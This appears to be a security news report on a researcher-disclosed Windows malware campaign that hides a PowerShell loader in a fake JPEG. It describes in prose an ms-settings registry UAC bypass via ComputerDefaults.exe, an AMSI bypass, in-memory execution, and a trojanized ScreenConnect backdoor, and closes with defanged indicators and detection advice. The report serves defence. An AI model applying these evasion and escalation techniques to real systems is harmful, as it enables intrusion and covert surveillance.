Security researchers at Cyfirma have uncovered a sophisticated new attack campaign dubbed Operation SilentCanvas that distributes malware disguised as a routine JPEG image file. Targeting Windows systems, the campaign chains together multiple advanced evasion techniques — including a UAC bypass, fileless execution, and a trojanized version of the legitimate ConnectWise ScreenConnect remote access tool — to give attackers deep, persistent, and largely invisible control of infected machines.
The Trojan Image: sysupdate.jpeg
The attack begins when a victim receives a file called sysupdate.jpeg — delivered through a phishing email, a fake software update prompt, or a deceptive file-sharing link. Despite its .jpeg extension, the file contains no image data whatsoever. It holds a PowerShell script engineered to quietly set up a staging environment and pull down additional malicious components from attacker-controlled servers.
Windows does not flag the file as a script because the extension mimics an image. When opened, the embedded PowerShell code creates a hidden folder at C:\Systems and downloads a trojanized ScreenConnect package from the attacker’s infrastructure over TCP port 5443.
To evade antivirus detection, the malware reconstructs dangerous command strings at runtime rather than embedding them in plaintext. A secondary payload named access.jpeg is downloaded and executed directly in memory, meaning no suspicious executable ever touches the disk. Microsoft’s own .NET compiler, csc.exe, then builds a custom launcher named uds.exe directly on the victim machine — giving each compiled binary a unique fingerprint that defeats signature-based scanning.
Silent Privilege Escalation via UAC Bypass
After the launcher is compiled on the victim machine, the malware executes a fileless UAC bypass with no visible security prompt. It hijacks a registry key tied to the ms-settings protocol and redirects it toward uds.exe, then triggers ComputerDefaults.exe — a trusted Windows binary that auto-elevates — causing the payload to run with full administrator rights silently. The registry key enabling this bypass is deleted within two seconds, destroying the evidence before any investigator can retrieve it.
This technique requires no exploit, no vulnerability, and no user interaction beyond the initial file opening. It abuses entirely legitimate Windows mechanisms, making it exceptionally difficult to detect through conventional means.
Deep Post-Compromise Capabilities
Once the trojanized ScreenConnect framework is active, attackers gain comprehensive control of the infected machine. The modified software supports:
- Real-time screen monitoring and video recording
- Microphone capture and keystroke logging
- Clipboard interception and silent file transfers through an encrypted channel
- A hidden desktop environment operating outside the logged-in user’s view
- Credential interception at the Windows login screen before credentials reach the authentication system
- Creation of hidden local administrator accounts for long-term persistent access
A persistent Windows service named OneDriveServers keeps the malware alive across reboots, mimicking the naming convention of legitimate Microsoft services to blend into the process list.
AMSI and Antivirus Evasion
The infection chain incorporates multiple layers of antimalware evasion. The PowerShell loader uses runtime string reconstruction to avoid static detection, in-memory execution to avoid disk-based scanning, and on-host compilation via csc.exe to produce a uniquely fingerprinted binary for each victim. The Antimalware Scan Interface (AMSI) is bypassed during the PowerShell execution phase, preventing Windows Defender and compatible security products from inspecting the malicious script content.
Indicators of Compromise
Organizations should immediately block or monitor the following indicators identified by Cyfirma:
- C2 IP: 45[.]138[.]16[.]64 (defanged)
- C2 Domain: legitserver[.]theworkpc[.]com (defanged)
- Malicious file names: sysupdate.jpeg, access.jpeg, uds.exe
- Staging directory: C:\Systems
- Malware persistence path: C:\ProgramData\OneDriveServer\
- Suspicious service name: OneDriveServers
Recommended Defensive Actions
Security teams should take the following steps to detect and respond to Operation SilentCanvas:
- Block or closely monitor execution of
csc.exe,cvtres.exe, andComputerDefaults.exewhen spawned by non-administrative processes - Deploy detection rules for PowerShell downloading executables and writing to hidden directories outside standard application paths
- Alert on ScreenConnect or ConnectWise Remote installations from non-standard directories, particularly
C:\ProgramData\OneDriveServer\ - Monitor for new Windows services with names mimicking Microsoft products (e.g., OneDriveServers)
- Enforce application allowlisting to prevent unauthorized use of
csc.exeas an on-host compiler - Perform credential resets for all privileged accounts on any system suspected of exposure
Operation SilentCanvas demonstrates how attackers are combining multiple living-off-the-land techniques with trojanized legitimate software to create attack chains that are highly resistant to detection at every stage. The use of trusted file extensions, legitimate system binaries, and well-known remote access software makes this campaign particularly challenging for conventional endpoint security to flag.